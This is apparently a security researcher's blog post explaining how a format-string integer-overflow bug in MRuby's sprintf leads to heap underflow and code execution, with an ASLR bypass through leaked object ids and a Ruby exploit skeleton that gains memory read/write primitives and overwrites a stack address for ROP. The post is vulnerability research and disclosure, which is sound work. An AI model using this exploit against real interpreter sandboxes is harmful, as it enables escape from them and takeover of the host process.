MRuby VM Escape – step by step

Last post we discussed format string implementation vulnerabilities, and focused on the vulnerabilities in the (C/M)Ruby implementation. Since shopify integrated MRuby in a VM-like scenario, we will present a step-by-step exploitation of the main shown vulnerability, achieving a VM escape.

Attack Scenario – MRuby VM

Shopify, and more specifically shopify-scripts, enables clients to embed Ruby scripts, using a thin (M)Ruby implementation called mruby-engine. MRuby-engine will be executed in a separate process, in addition to the fact that the engine creates a thread that limits the memory resources and the execution time of the interpreter thread.

This thin version uses only a limited subset of mruby-gems, and unfortunately sprintf is not one of them. However, since the format string feature is widely used, this post will simulate the potential risk in a scenario that does integrate the sprintf gem. And so, from now on we will assume that the format string module is used in the engine, practically assuming that this is an MRuby VM, instead of an MRuby-engine VM.

Attack Scenario – Main Vulnerability

The vulnerability that was presented in the previous post was in a format string vulnerability, using the “%G” case:

...
// EI: fractions (%f, %G, ...)
if ((flags&FWIDTH) && need < width)
  need = width;
need += 20;
CHECK(need);
// EI: And this is a double vulnerability
n = snprintf(&buf[blen], need, fbuf, fval);
blen += n;

A large width specifier, will cause an integer-overflow vulnerability , thus bypassing the limit checks
The invalid format will cause the snprintf() call to fail, returning -1
“blen +=n“ will decrease the blen variable, responsible for the write offset in the allocated buffer

In short, we can move the write offset in the response buffer backwards in a controlled fashion, causing a fully-controlled heap buffer underflow.

Write Primitive – detailed analysis

Since we may want to overwrite data that is positioned far before our buffer, we need to check a few conditions regarding the mrb_str_format function:

Can we position our response buffer ahead of the desired target?
Can the format string operation end before the start of the response buffer?

The answer to the 1st question will be explained in the next chapter, that will discuss several memory allocation keynotes.

The 2nd question is especially important, telling us if we need can achieve a write-what-where-like primitive, or a contiguous write that may collide with other sensitive data structures near the wanted target. Unfortunately, snprintf() terminates the buffer with ‘\0’ on error cases. This means that it will leave a trail of 0s on our underflow path, not exactly a minor side effect. We will have to minimize the length of our underflow, together with manually updating several values to ensure correctness.

MRuby Memory layout

Important note: the exploitation setup is my 32-bit linux VM, ASLR is enabled.

Keynotes for a recon about the memory layout of the target process:

mruby_elf

Bitness – 32 bits in our case
OS – Ubuntu 16.04
ASLR – fixed position elf, randomly mapped libraries
Memory pool implementation – interpreter wrapper over standard malloc()
W^E – enabled

The last point is sometimes very important, as PHP for example implements a tailor made memory pool. Since their memory pool is very naive, it is much simpler to exploit it when having heap BOFs, as opposing to the standard malloc() that now has quite a few sanitation checks.

The 3rd point offers a great starting point, and it is somewhat typical for targets that were compiled for linux machines:

We can build a ROP from gadgets in the main elf, without an information disclosure
We can use the elf’s globals without an information disclosure

This means that we only need to pivot the stack to a controlled buffer, and the rest will be relatively easy.

Locating our response buffer

MRuby buffer objects, strings (RO) and arrays (RW) for example, consist of two memory data structures:

Metadata structure – relatively small allocation
Data buffer – allocation according to “size + 1“ for strings

The basic allocation of the response buffer in the vulnerable function is:

bsiz = 120
MRB_STR_BUF_MIN_SIZE = 128
Basic allocation = MRB_STR_BUF_MIN_SIZE + 1 = malloc(129)

Garbage Collection

MRuby’s garbage collector (GC) can be tuned, allowing us to completely stop it for the entire exploit. This is necessary as we want to operate in a stable, and hopefully static, memory heap.

ASLR Bypass

ASLR is a great defense concept, however it’s common implementations have some major drawbacks. In our case, we can roughly say that the ASLR randomizes the second MSB in the address:

Addresses can still be categorized (heap, stack, code) using the MSB
Offsets in each section (stack/heap) are fixed, offering a quite playground for an attacker

We still need to find this randomized address byte for the heap and for the stack. Here the interpreter nature of the VM comes to our rescue. While we can search for an information disclosure vulnerability in MRuby, like this vulnerability I found several weeks prior to the format string vulnerability, there is an easier way. Interpreter languages needs to generate a unique id for each object, most of the times this id is simply the memory address of the object.

In addition, when building the string representation of a class instance, the default representation will be it’s name + id. This exposes the id even without the need to check the syntax for it per targeted interpreter language.

Interpreter VM – Conclusion #1:

The unique id for an object is commonly it’s address in memory. This gives an attacker an easy ASLR bypass for a specific (often heap) object. Combined with a read-where primitive, this often enables an easy construction of the entire memory map of the VM

Memory Layout Tips

The memory layout is extremely fragile! Almost every change of a string, function call, or code snippet will mix up the layout. Here are several tips to avoid such changes:

Allocate fixed global variables and strings in advance
Fine tune the values of the globals on the way, and maintain their original sizes
“1” * 10 != “1111111111” – use “ugly” long strings for placeholders
Allocate several format string options, and pick the one that best suites the layout

In order to minimize the length of our overflow, we will allocate a large amount of strings and arrays, thus closing the gap between the small allocations and the large allocations. We will then pick the closest allocated objects as our targets.

Exploit – putting it all together

Now we only need to combine together the primitives we collected so far, so our exploit’s skeleton will look like this:

# Position the ROP code for later use (filled later)
rop_code = '' # assume a const string of size 0x2000 (see previous tips)
# Create a dummy class that will be used for the information disclosure (INF)
class A
end
# Disable the GC so it won't interfere
GC.disable()

# prepare the address offsets in advance
heap_MSB  = 0x00000000
stack_MSB = 0xB0000000
# Leak the heap's address using the leaked id
# The actual offset depends on the final memory layout
heap_base = A.new.to_s()[6, 7].to_i(16) - OBJ_HEAP_OFFSET
# Prepare the format options, the best option will be picked for use
# Using an option changes the layout much less than building an option
length1 = SMALL_LENGTH # small option
#                                       huge (signed) length      stack buffer                              malloc metadata
format1 = "% 2147483628G" * length1 + "\x00\x00\x00\x40" * 2 + "\x08\x00\x00\xB0" + "8" * (length1 - 16) + "\x81\x00\x00\x00"
args1   = [1.2] * length1

length2 = BIG_LENGTH # huge option (wasn't needed after all)
format2 = "% 2147483628G" * length2 + "\x11\x22\x33\x44" * 2 + "\x22\x33\x44\x55" + "7" * (length2 - 16) + "\x81\x00\x00\x00"
args2   = [1.2] * length2

length3 = MED_LENGTH # medium option
#                                      huge (signed) length        heap buffer
format3 = "% 2147483628G" * length3 + "\x00\x00\x00\x40" * 2 + "\x00\x00\x00\x00" + "6" * (length3 - 16) + "\x81\x00\x00\x00"
args3   = [1.2] * length3

# prepare a product of all options
args11 = [format1] + args1
args12 = [format1] + args2
args13 = [format1] + args3

args21 = [format2] + args1
args22 = [format2] + args2
args23 = [format2] + args3

args31 = [format3] + args1
args32 = [format3] + args2
args33 = [format3] + args3
# declare the pool of target strings
index = 0
string_pool = []
while index < 2000 do
  string_pool.append("1" * 20) # size of a metadata chunk
  index += 1
end
# Exploit vulnerability to change the string - gaining a Read-Where primitive:
# pointer = 0 (heap MSB is 0)
# length, capacity = huge (positive) constant
sprintf(*args32)

# Search for a stack address somewhere in the heap
stack_address = 0
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 3 - heap_MSB].ord()
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 2 - heap_MSB].ord()
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 1 - heap_MSB].ord()
stack_address = stack_address * 256 + string_pool[STR_TARGET_OFFSET][heap_base + HEAP_OFFSET + 0 - heap_MSB].ord()
stack_base = stack_address - STACK_INF_OFFSET

# declare the pool of target arrays
index = 0
array_pool = []
while index < 400 do
  array_pool.append([1])
  index += 1
end

# Exploit vulnerability to change the array - gaining a Write-What-Where primitive:
# pointer = stack MSB + possible alignment (8)
# length, capacity = some (positive) huge constant
sprintf(*args12)
target_array = array_pool[ARRAY_TARGET_OFFSET]

# Overwrite the desired stack target with out ROP code
target_array[(stack_base - stack_MSB + STACK_WRITE_OFFSET) / 0xC] = heap_base + ROP_HEAP_OFFSET

Technical note

Each array element is 12 (0xC) bytes, and that is why I added the division in the last line. In case that the desired address is not aligned, we can simply change the LSB in the format_args so that it would match the desired remainder (8 in our case), effectively aligning the address.

Flash-like exploit

During the exploit we use a popular techniques that is more common in flash exploits: modifying a buffer object’s metadata (Vector in flash) to allow read-where and write-what-where primitives. This works will in interpreter VM scenarios, enabling us to leverage our write-primitive into much simpler read/write primitives.

Cartography

Using the read-where primitive we can scan the heap for a stack address. Since the ASLR is weak we can due this in a pre-process step. I usually call this recon phase “cartography”, as we travel the memory layout, collect interesting addresses, and build a detailed map of the process. Once we have a read-where primitive in a VM-like scenario, the cartography phase becomes a technical, but easy, phase.

Since we already gathered a heap address, we located the heap’s base. Surprisingly, it is often very easy to locate stack addresses on the heap, this time I found an address on the 3rd attempt: HEAP_OFFSET = 8. We can locate the libraries using the PLT, and the fact that it has a fixed address.

Note #1: Taking control over the program’s flow can done using the GOT, since we have a write-what-where primitive. I used the stack instead in order to demonstrate that even when modern defense mechanisms are deployed, cartography is still a walk in the park from an attackers point of view.

Note #2: If the elf’s code was also randomized, one could locate it simply by scanning the stack’s return addresses.

Interpreter VM – Conclusion #2:

VM-like environments enables an attacker with a read-where primitive, and a single memory “clue” to easily build a detailed memory map. The cartography phase isn’t noticeable by the VM, and it allows an attacker a complete ASLR bypass using a single memory “clue”: heap address, stack address, etc.

Filling up the figures

From here on it only takes some careful debugging for filling up the needed constant offsets, to finalize the exploit. Since all of the needed technical details were already explained in the post, I leave it as an exercise for the eager readers.

Conclusion

Using a format string implementation vulnerability in the MRuby library, I demonstrated the design flaws in an Interpreter-VM scenario. Combining it all together, we achieved the desired goal of a “VM Escape”, gaining the attacker full control over the targeted process. I believe that several of the techniques used during the exploit can be migrated to other cases, much like the flash Vector technique was migrated to this interpreter scenario. It seems like the cartography phase will continue to be an important phase in VM-like exploits, and hopefully it will be addressed by more defense mechanisms in the future.

White hat security researcher. Recently finished my M.s.c at TAU, and now focus on security research, mainly in open sources. View all posts by eyalitkin